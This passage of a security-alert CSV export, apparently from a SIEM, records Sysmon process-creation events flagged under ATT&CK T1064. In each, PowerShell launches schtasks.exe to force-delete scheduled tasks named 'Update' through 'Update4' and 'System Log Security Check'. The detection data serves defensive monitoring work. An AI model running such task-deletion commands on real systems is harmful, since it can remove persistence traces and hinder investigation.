Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.519",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.016 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001046db2b00} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.018445300Z"",""eventRecordID"":""3315"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.016\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001046db2b00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.016"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001046db2b00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.499",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.992 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108fd92b00} +ProcessId: 5996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.995989200Z"",""eventRecordID"":""3314"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.992\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108fd92b00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.992"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00108fd92b00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.487",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.964 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d6d72b00} +ProcessId: 4656 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.968220000Z"",""eventRecordID"":""3313"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.964\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d6d72b00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.964"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010d6d72b00}"",""processId"":""4656"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.446",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.939 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00103dd62b00} +ProcessId: 4340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.941347100Z"",""eventRecordID"":""3312"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.939\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00103dd62b00}\r\nProcessId: 4340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.939"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00103dd62b00}"",""processId"":""4340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.421",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.913 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108ad42b00} +ProcessId: 5724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.919669000Z"",""eventRecordID"":""3311"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.913\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108ad42b00}\r\nProcessId: 5724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.913"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00108ad42b00}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.395",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.892 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c4d22b00} +ProcessId: 8188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.894672200Z"",""eventRecordID"":""3310"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.892\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c4d22b00}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.892"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010c4d22b00}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 